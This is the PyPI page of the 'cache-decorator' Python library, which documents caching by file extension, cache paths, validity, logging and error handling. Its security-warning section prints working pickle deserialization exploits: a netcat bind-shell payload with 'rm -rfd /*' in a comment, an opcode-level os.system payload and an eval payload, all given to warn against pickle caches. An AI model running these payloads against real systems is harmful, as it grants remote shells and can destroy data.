cache-decorator · PyPI · The Python Package Index

A simple decorator to cache the results of computationally heavy functions


Project description

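A simple decorator to cache the results of computationally heavy functions. The package automatically serializes and deserializes the results according to the format of the save path.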

By default, .json .json.gz .json.bz .json.lzma and .pkl .pkl.gz .pkl.bz .pkl.lzma .pkl.zip are supported; other extensions become available if the following packages are installed:

numpy: .npy .npz

pandas: .csv .csv.gz .csv.bz2 .csv.zip .csv.xz

There are also optimized formats for numeric DataFrames:

pandas: .embedding .embedding.gz .embedding.bz2 .embedding.xz

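This creates an optionally compressed tar archive containing a pickle of the index and the columns, and a .npy file with the values.

For example, a function that returns a dictionary can store each entry in its own format by passing a dictionary of paths whose keys match the returned keys: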

import time
import numpy as np
import pandas as pd
from cache_decorator import Cache

@Cache(
    cache_path={
        "info": "/tmp/{function_name}/{_hash}.json.xz",
        "data": "/tmp/{function_name}/{_hash}.csv.gz",
    },
    validity_duration="24d",
    args_to_ignore=("verbose",),
    enable_cache_arg_name="enable_cache",
)
def function_to_cache(seed: int, verbose: bool = True):
    np.random.seed(seed)
    if verbose:
        print(f"using seed {seed}")
    return {
        "info": {"timestamp": time.time(), "seed": seed,},
        "data": pd.DataFrame(
            np.random.randint(0, 100, size=(100, 4)), columns=list("ABCD")
        ),
    }

How to install this package?

As usual, just download it using pip:

pip install cache_decorator

Usage examples

To cache a function or method, just decorate it with the Cache decorator.

from time import sleep
from cache_decorator import Cache
from dict_hash import Hashable

@Cache()
def x(a, b):
    sleep(3)
    return a + b

class A(Hashable):
    def __init__(self, x):
        self.x = x

    # you can call a method without args
    def my_method(self):
        return "|{}|".format(self.x)

    # you can call a static method
    @staticmethod
    def my_staticmethod():
        return "CIAO"

    # you can call a property
    @property
    def my_property(self):
        return "|{}|".format(self.x)

    # methods, static methods, and properties can return a custom formatter
    # that accesses attributes but can't call other methods
    def custom_formatter_method(self):
        return "{self.x:.4f}"

    @Cache(
        # this is a quick example of most things you can do in the formatting
        # ("/".join takes a single iterable, hence the list)
        cache_path="/".join([
            "{cache_dir}",
            "{self.x}",
            "{self.my_method()}",
            "{self.my_staticmethod()}",
            "{self.my_property()}",
            "{self.custom_formatter_method()}",
            "{a}",
            "{b}_{_hash}.pkl",
        ])
    )
    def f(self, a, b):
        sleep(3)
        return a + b

    # only needed if you want "{_hash}" in the path
    def consistent_hash(self) -> str:
        return str(self.x)

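Cache path

The default cache directory is ./cache, but it can be changed by passing the cache_dir argument to the decorator or by setting the CACHE_DIR environment variable. If both are set, the argument takes precedence over the environment variable.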

from time import sleep
from cache_decorator import Cache

@Cache(cache_dir="/tmp")
def x(a):
    sleep(3)
    return a
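The precedence rule can be restated in a few lines. This is a minimal sketch with a hypothetical helper, resolve_cache_dir, not the library's code: explicit argument first, then the CACHE_DIR environment variable, then ./cache.

```python
import os
from typing import Optional


def resolve_cache_dir(cache_dir: Optional[str] = None) -> str:
    """Hypothetical helper restating the documented precedence:
    cache_dir argument > CACHE_DIR environment variable > "./cache"."""
    if cache_dir is not None:
        # An explicit argument always wins.
        return cache_dir
    # Otherwise fall back to the environment, then to the default folder.
    return os.environ.get("CACHE_DIR", "./cache")
```

When exactly the decorator reads CACHE_DIR (at decoration time or at call time) is not stated here, so it is safer to set the variable before importing and decorating your functions.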

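The path format can be changed by passing the cache_path argument. This string is formatted with information about the function, its arguments and, if the function is a method, the attributes of self.

The default path is: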

from time import sleep
from cache_decorator import Cache

@Cache(cache_path="{cache_dir}/{file_name}_{function_name}/{_hash}.pkl")
def x(a):
    sleep(3)
    return a

It can be changed to give the cache a more meaningful name. For example, we can add the value of a to the file name:

from time import sleep
from cache_decorator import Cache

@Cache(cache_path="{cache_dir}/{file_name}_{function_name}/{a}_{_hash}.pkl")
def x(a):
    sleep(3)
    return a
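Conceptually, a path template is filled in like a Python format string. The sketch below uses plain str.format with made-up values for cache_dir, file_name, function_name, a and _hash; the decorator computes the real values itself (including the hash), and its formatter also supports things plain str.format cannot do, such as calling methods on self.

```python
# Made-up values: the decorator fills these in itself when the function is called.
template = "{cache_dir}/{file_name}_{function_name}/{a}_{_hash}.pkl"

path = template.format(
    cache_dir="./cache",
    file_name="my_script",   # hypothetical
    function_name="x",
    a=42,                    # the value of the argument a
    _hash="0123abcd",        # placeholder, not a real hash
)
print(path)  # ./cache/my_script_x/42_0123abcd.pkl
```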

Depending on the file extension, a different serialization and deserialization dispatcher is called.

from time import sleep
import numpy as np
from cache_decorator import Cache

@Cache(cache_path="/tmp/{_hash}.pkl.gz")
def x(a):
    sleep(3)
    return a

@Cache(cache_path="/tmp/{_hash}.json")
def x(a):
    sleep(3)
    return {"1":1,"2":2}

@Cache(cache_path="/tmp/{_hash}.npy")
def x(a):
    sleep(3)
    return np.array([1, 2, 3])

@Cache(cache_path="/tmp/{_hash}.npz")
def x(a):
    sleep(3)
    return np.array([1, 2, 3]), np.array([1, 2, 4])
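The idea behind extension-based dispatch can be sketched with the standard library alone. The dispatch table, the helper names store_by_extension and load_by_extension, and the two supported suffixes are hypothetical; this is not how cache_decorator is implemented internally, only an illustration of picking a serializer from the file name.

```python
import gzip
import json
import pickle
from pathlib import Path
from typing import Any, Callable, Dict, Tuple


def _dump_json(obj: Any, path: Path) -> None:
    path.write_text(json.dumps(obj))


def _load_json(path: Path) -> Any:
    return json.loads(path.read_text())


def _dump_pkl_gz(obj: Any, path: Path) -> None:
    with gzip.open(path, "wb") as f:
        pickle.dump(obj, f)


def _load_pkl_gz(path: Path) -> Any:
    with gzip.open(path, "rb") as f:
        return pickle.load(f)


# Hypothetical dispatch table: suffix -> (serializer, deserializer).
DISPATCH: Dict[str, Tuple[Callable[[Any, Path], None], Callable[[Path], Any]]] = {
    ".json": (_dump_json, _load_json),
    ".pkl.gz": (_dump_pkl_gz, _load_pkl_gz),
}


def _handlers_for(path: Path):
    # Try longer suffixes first so compound extensions win over shorter ones.
    for suffix in sorted(DISPATCH, key=len, reverse=True):
        if path.name.endswith(suffix):
            return DISPATCH[suffix]
    raise ValueError(f"Unsupported extension: {path.name}")


def store_by_extension(obj: Any, path: str) -> None:
    target = Path(path)
    dump, _ = _handlers_for(target)  # fail before touching the filesystem
    target.parent.mkdir(parents=True, exist_ok=True)
    dump(obj, target)


def load_by_extension(path: str) -> Any:
    target = Path(path)
    _, load = _handlers_for(target)
    return load(target)
```

Checking longer suffixes first matters once the table contains overlapping entries, for example both .gz and .pkl.gz.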

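Ignoring arguments when computing the hash

By default, caches are distinguished by the arguments passed to the function. You can specify which arguments should be ignored.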

from time import sleep
from cache_decorator import Cache

@Cache(args_to_ignore=["verbose"])
def x(a, verbose=False):
    sleep(3)
    if verbose:
        print("HEY")
    return a

You can pass a list of strings with the names of the arguments to ignore.

from time import sleep
from cache_decorator import Cache

@Cache(args_to_ignore=["verbose", "multiprocessing"])
def x(a, verbose=False, multiprocessing=False):
    sleep(3)
    if verbose:
        print("HEY")
    return a
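A sketch of how ignored arguments can be kept out of a cache key, using only the standard library (inspect, json, hashlib). The function call_key is hypothetical and the library computes its own hash differently; the point is only that ignored names are dropped before hashing, so calls that differ only in those arguments share a key.

```python
import hashlib
import inspect
import json
from typing import Any, Callable, Dict, Iterable


def call_key(
    func: Callable[..., Any],
    args: tuple,
    kwargs: Dict[str, Any],
    args_to_ignore: Iterable[str] = (),
) -> str:
    """Hypothetical cache key: hash of the call's arguments, minus ignored ones."""
    bound = inspect.signature(func).bind(*args, **kwargs)
    # Fill in defaults so x(1) and x(1, verbose=False) produce the same key.
    bound.apply_defaults()
    ignored = set(args_to_ignore)
    relevant = {
        name: value for name, value in bound.arguments.items() if name not in ignored
    }
    # sort_keys makes the key independent of keyword order; repr is a crude
    # fallback for values JSON cannot encode.
    payload = json.dumps(relevant, sort_keys=True, default=repr)
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()
```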

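Dynamically enabling the cache

Sometimes the cache needs to be enabled or disabled dynamically. This is supported through the enable_cache_arg_name parameter, used as follows:

from time import sleep
import numpy as np
from cache_decorator import Cache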

# simple boolean argument

@Cache(
    enable_cache_arg_name="enable_cache",
)
def function_to_cache(seed: int):
    np.random.seed(seed)
    return {"seed":seed}

# Cache enabled
function_to_cache(10)
# Cache enabled
function_to_cache(10, enable_cache=True)
# Cache disabled
function_to_cache(10, enable_cache=False)

class TestEnableCacheArgAsAttribute:
    def __init__(self, enable_cache: bool):
        self.enable_cache = enable_cache

    @Cache(
        cache_path="{cache_dir}/{a}.pkl",
        cache_dir="./test_cache",
        enable_cache_arg_name="self.enable_cache",
    )
    def cached_method(self, a):
        sleep(2)
        return [1, 2, 3]

instance = TestEnableCacheArgAsAttribute(enable_cache=True)
# with cache enabled
instance.cached_method(1)
# disable the cache
instance.enable_cache = False
instance.cached_method(1)


class TestEnableCacheArgAsAttributeProperty:
    def __init__(self, enable_cache: bool):
        self.enable_cache = enable_cache

    @property
    def is_cache_enabled(self):
        return self.enable_cache

    @Cache(
        cache_path="{cache_dir}/{a}.pkl",
        cache_dir="./test_cache",
        enable_cache_arg_name="self.is_cache_enabled()",
    )
    def cached_method(self, a):
        sleep(2)
        return [1, 2, 3]

instance = TestEnableCacheArgAsAttributeProperty(enable_cache=True)
# with cache enabled
instance.cached_method(1)
# disable the cache
instance.enable_cache = False
instance.cached_method(1)

class TestEnableCacheArgAsAttributeStatic:
    """This can be used for abstract classes"""
    def __init__(self, enable_cache: bool):
        self.enable_cache = enable_cache

    @staticmethod
    def is_cache_enabled():
        return True

    @Cache(
        cache_path="{cache_dir}/{a}.pkl",
        cache_dir="./test_cache",
        enable_cache_arg_name="self.is_cache_enabled()",
    )
    def cached_method(self, a):
        sleep(2)
        return [1, 2, 3]

instance = TestEnableCacheArgAsAttributeStatic(enable_cache=True)
instance.cached_method(1)

For more usage examples, see the tests: test/test_method.py and test/test_enable_cache_arg_name.py.
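The three ways of naming the flag (a keyword argument, an attribute of self, or a method, static method or property of self) could be resolved roughly as follows. resolve_enable_cache is a hypothetical helper written to illustrate the behavior shown in the examples; it is not the library's implementation, and defaulting to True when the keyword is missing is an assumption based on the first example.

```python
from typing import Any, Dict


def resolve_enable_cache(arg_name: str, instance: Any, kwargs: Dict[str, Any]) -> bool:
    """Hypothetical resolver for an enable_cache_arg_name value.

    "enable_cache"      -> keyword argument of the call (popped, default True)
    "self.enable_cache" -> attribute of the instance
    "self.name()"       -> a method or static method is called; a property is
                           simply read, since accessing it already runs it
    """
    if not arg_name.startswith("self."):
        # Pop the flag so the wrapped function never receives it.
        return bool(kwargs.pop(arg_name, True))
    attribute = arg_name[len("self."):]
    if attribute.endswith("()"):
        value = getattr(instance, attribute[:-2])
        return bool(value() if callable(value) else value)
    return bool(getattr(instance, attribute))
```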

Cache validity

A cache can also have a validity duration.

from time import sleep
from cache_decorator import Cache

@Cache(
    cache_path="/tmp/{_hash}.pkl.gz",
    validity_duration="24d",
)
def x(a):
    sleep(3)
    return a

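In this example, the cache is valid for the next 24 days; on the 25th day it will be rebuilt. The duration can be given as a number of seconds or as a string with a unit. The units are "s" for seconds, "m" for minutes, "h" for hours, "d" for days and "w" for weeks.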
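A minimal sketch of turning these duration strings into seconds and checking whether a cache entry has expired. parse_duration and is_expired are hypothetical helpers; how the library records the creation time of a cache entry is not described here, so the timestamps are passed in explicitly.

```python
from typing import Union

# Seconds per unit, matching the units listed above: s, m, h, d, w.
_SECONDS_PER_UNIT = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}


def parse_duration(duration: Union[int, float, str]) -> float:
    """Hypothetical parser: a number of seconds, or a string such as "24d"."""
    if isinstance(duration, (int, float)):
        return float(duration)
    text = duration.strip()
    if text[-1].isdigit():
        # A bare number given as a string, e.g. "3600".
        return float(text)
    value, unit = text[:-1], text[-1]
    if unit not in _SECONDS_PER_UNIT:
        raise ValueError(f"Unknown duration unit: {unit!r}")
    return float(value) * _SECONDS_PER_UNIT[unit]


def is_expired(created_at: float, duration: Union[int, float, str], now: float) -> bool:
    """True once more than `duration` has passed since `created_at` (both in seconds)."""
    return now - created_at > parse_duration(duration)
```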

Logging

Every time a new function is decorated with this decorator, a new logger is created. You can customize the default logger with log_level and log_format.

from time import sleep
from cache_decorator import Cache

@Cache(log_level="debug")
def x(a):
    sleep(3)
    return a

If you don't like the default format, you can change it:

from time import sleep
from cache_decorator import Cache

@Cache(log_format="%(asctime)-15s[%(levelname)s]: %(message)s")
def x(a):
    sleep(3)
    return a

For more information about the format string, see https://docs.python.org/3/library/logging.html.
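To see what a log_format string produces before passing it to the decorator, you can try it on a throwaway logger with the standard logging module. This uses only stdlib logging; the logger name format_preview is arbitrary.

```python
import io
import logging

# Same format string as in the log_format example above.
LOG_FORMAT = "%(asctime)-15s[%(levelname)s]: %(message)s"

buffer = io.StringIO()
handler = logging.StreamHandler(buffer)
handler.setFormatter(logging.Formatter(LOG_FORMAT))

# Arbitrary logger name used only for this preview.
preview = logging.getLogger("format_preview")
preview.setLevel(logging.INFO)
preview.addHandler(handler)
preview.propagate = False  # keep the preview out of any root handlers

preview.info("hello")
print(buffer.getvalue())
```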

In addition, the name of the default logger is

logging.getLogger("cache." + function.__name__)

so we can get a reference to the logger and customize it completely:

import logging
from cache_decorator import Cache

@Cache()
def test_function(x):
    return 2 * x

# Get the logger
logger = logging.getLogger("cache.test_function")
logger.setLevel(logging.DEBUG)

# Make it log to a file
handler = logging.FileHandler("cache.log")
logger.addHandler(handler)

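Error handling

A common problem we noticed when using this library is that, if the type being saved is not compatible with the chosen extension, the program raises an exception at the end of the function and all the work done is lost. To mitigate this, the cache decorator now has a built-in error-handling system: if an error occurs while serializing the result, the program automatically falls back to saving it with pickle. By default, this appends _backup.pkl to the original path, but if for any reason this would overwrite a file, a random string is appended instead. Both the path of the backup file and the path where the file was expected to be written are logged at CRITICAL level.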
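The naming rule for the backup file can be sketched as follows. choose_backup_path is a hypothetical helper, and the shape of the random string (16 hex characters from secrets.token_hex) is an assumption; the library's own random suffix may look different.

```python
import os
import secrets


def choose_backup_path(path: str) -> str:
    """Hypothetical helper: append "_backup.pkl" to the intended path and,
    if that file already exists, use a random suffix instead of overwriting it."""
    candidate = path + "_backup.pkl"
    while os.path.exists(candidate):
        candidate = f"{path}_backup_{secrets.token_hex(8)}.pkl"
    return candidate
```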

Suppose we mistakenly set the extension to CSV instead of JSON:

from cache_decorator import Cache

@Cache("./test_{x}.csv")
def test_function(x):
    return {"this":{"is":{"not":{"a":"csv"}}}}

test_function(10)
# 2021-02-22 13:22:07,286[CRITICAL]: Couldn't save the result of the function. Saving the result as a pickle at:
# ./test_10.csv_backup.pkl
# The file was gonna be written at:
# ./test_10.csv

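Now we can load the value manually and store it at the correct path, so that on the next function call the cache is loaded correctly with the right extension.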

import json
import pickle

# Load the backup
with open("./test_10.csv_backup.pkl", "rb") as f:
    result = pickle.load(f)

# Save it at the right path
with open("./test_10.json", "w") as f:
    json.dump(result, f)

from cache_decorator import Cache

@Cache("./test_{x}.json")
def test_function(x):
    return {"this":{"is":{"not":{"a":"csv"}}}}

test_function(10) # Load the corrected Cache at "./test_10.json"

Alternatively, the problem can be handled programmatically by catching the exception and accessing its fields.

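from cache_decorator import Cache
# SerializationException is used but not imported in the original example;
# we assume the package exposes it here, check your installed version
from cache_decorator import SerializationException

@Cache("./test.csv")
def test_function(x):
    return {"this":{"is":{"not":{"a":"csv"}}}}

try:
    test_function(10)
except SerializationException as e:
    result = e.result            # the value returned by the function
    backup_path = e.backup_path  # where the pickle backup was written
    path = e.path                # where the file was supposed to be written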

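In addition, the backup path can be customized with the backup_path parameter. Here you can use the same placeholders as for the path, plus {_date}, the date of the backup, and {_rnd}, a random string that guarantees the file will not overwrite other files.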

from cache_decorator import Cache

@Cache("./test.csv", backup_path="./backup_{_date}_{_rnd}.pkl")
def test_function(x):
    return {"this":{"is":{"not":{"a":"csv"}}}}

test_function(10)

# 2021-02-22 13:22:07,286[CRITICAL]: Couldn't save the result of the function. Saving the result as a pickle at:
# ./backup_2021_02_22_13_22_07_18ce30b003e14d16d5e0f749e8205e467aedfbba.pkl
# The file was gonna be written at:
# ./test.csv

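Internals

If for any reason you need a reference to the wrapped function or to its cache class instance, you can access them through internal attributes: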

from cache_decorator import Cache

@Cache()
def test_function(x, y):
    return 2 * x

original_test_function = test_function.__cached_function
test_function_cacher_class = test_function.__cacher_instance

We do not recommend using them.

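Manual caching

If for some reason you need to manage the cache manually, you can use the built-in static methods of the Cache class. They automatically create any missing folders. You can also get the path that a given function call would use.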

from cache_decorator import Cache

# you can use the Cache class functions to load and store data easily
# but here you can't use a path formatter but you have to pass a complete path.

# Store
Cache.store({1:2, 3:4}, "./my_custom_cache/best_dict_ever.json")

# Load
best_dict = Cache.load("./my_custom_cache/best_dict_ever.json")

# This would not format anything!
# Cache.store({1:2, 3:4}, "./my_custom_cache/{_hash}.json")
# this would save a file literally called "{_hash}.json"

@Cache()
def test_function(x, y):
    return 2 * x


# you can get the path where the file would be saved (this does not call the function!).
path = Cache.compute_path(test_function, 10, y="ciao")

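Security warning

Avoid the pickle extensions whenever possible. Deserializing untrusted data can lead to remote code execution or local privilege escalation (https://davidhamann.de/2020/04/05/exploiting-python-pickle/). For this reason, simple formats such as json should be preferred whenever possible.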

Suppose we have the following code:

from cache_decorator import Cache

@Cache("./cache/{x}.pkl")
def my_awesome_function(x):
    return x

...

my_awesome_function(1)

If we have any kind of access to the cache folder, we can easily exploit it:

import pickle

COMMAND = "netcat -c '/bin/bash -i' -l -p 4444" # rm -rfd /*

class PickleRce(object):
    def __reduce__(self):
        import os
        return (os.system,(COMMAND,))

payload = pickle.dumps(PickleRce())
print(payload)
# b"\x80\x04\x95>\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c#netcat -c '/bin/bash -i' -l -p 4444\x94\x85\x94R\x94."

with open("./cache/1.pkl", "wb") as f:
    f.write(payload)

The next time the function is called with the argument 1, it will start a remote shell and we will take control of the system.

Alternatively, since pickle is a "programming language" executed by a VM, we can write a generic RCE exploit that uses only builtins:

import pickle

# Build the exploit
command = b"""cat flag.txt"""
x = b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R."%command

# Test it
pickle.loads(x)

Or you can simply call eval and execute arbitrary Python code:

import pickle

code = "print('ciao')"

pickle.loads(b"".join([
    b"c__builtin__\neval\n(",
    pickle.dumps(code, protocol=0)[:-1],
    b"tR."
]))

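Therefore, it is important to use simpler serialization schemes (such as json) and to harden the system by making the cache directory accessible only to the current user:

chown -R $USER:$USER ./cache
chmod -R u=rwX,go= ./cache

This way, only the current user (and therefore the application running as that user) can create and modify the cache files.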
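The same hardening can be done from Python, for example at application start-up. This is a sketch using only os and stat; restrict_to_owner and is_owner_only are hypothetical helper names. Directories get 0o700 because the owner needs the execute bit to enter them, and regular files get 0o600.

```python
import os
import stat


def restrict_to_owner(root: str) -> None:
    """Remove all group/other permissions on root and everything below it."""
    os.chmod(root, 0o700)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                # Skip symlinks so we never change permissions outside the cache.
                continue
            os.chmod(full, 0o700 if os.path.isdir(full) else 0o600)


def is_owner_only(path: str) -> bool:
    """True if neither the group nor other users have any permission bits."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0
```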

Release history

2.2.0 (this version): January 26, 2024
2.1.15: July 31, 2023
2.1.14: May 25, 2023
2.1.13: November 9, 2022
2.1.11: August 7, 2022
2.1.10: August 6, 2022
2.1.9: August 5, 2022
2.1.8: June 24, 2022
2.1.7: June 21, 2022
2.1.6: May 31, 2022
2.1.5: May 31, 2022
2.1.4: May 31, 2022
2.1.3: May 27, 2022
2.1.2: May 27, 2022
2.1.1: May 27, 2022
2.1.0: May 24, 2022
2.0.16: May 12, 2022
2.0.15: May 6, 2022
2.0.14: April 29, 2022
2.0.13: December 14, 2021
2.0.12: November 13, 2021
2.0.11: November 13, 2021
2.0.10: November 9, 2021
2.0.9: September 6, 2021
2.0.8: September 5, 2021
2.0.7: September 4, 2021
2.0.6: June 23, 2021
2.0.5: June 22, 2021
2.0.4: June 22, 2021
2.0.3: April 26, 2021
2.0.2: April 12, 2021
2.0.1: March 28, 2021
2.0.0: March 24, 2021
1.6.0: February 22, 2021
1.5.1: February 17, 2021
1.5.0: January 17, 2021
1.4.1: October 30, 2020
1.4.0: October 8, 2020
1.3.2: August 12, 2020
1.3.0: August 12, 2020
1.2.5: April 5, 2020
1.2.4: April 5, 2020
1.2.3: April 5, 2020
1.2.2: March 29, 2020
1.2.1: March 28, 2020
1.2.0: March 27, 2020
1.1.9: March 27, 2020
1.1.8: March 27, 2020
1.1.7: March 27, 2020
1.1.6: March 27, 2020
1.1.5: March 27, 2020
1.1.3: March 20, 2020
1.1.2: February 28, 2020
1.1.1: February 25, 2020
1.1.0: February 25, 2020
1.0.0: February 24, 2020

Download files

Source distribution

cache_decorator-2.2.0.tar.gz (35.9 kB), uploaded January 26, 2024

Hashes for cache_decorator-2.2.0.tar.gz

Algorithm	Hash digest
SHA256	`ebb427b5acb00fb0a47ed9fc7d52fe96de94f40ca52f381205ace8756df6df5a`
MD5	`8968eba947bf38bb9c1c9cdba5bff3a8`
BLAKE2b-256	`bd52b372ebef6d7e8322dd46ff176fa91cb8374adee85ec54fd6b13bbe0a8eaf`
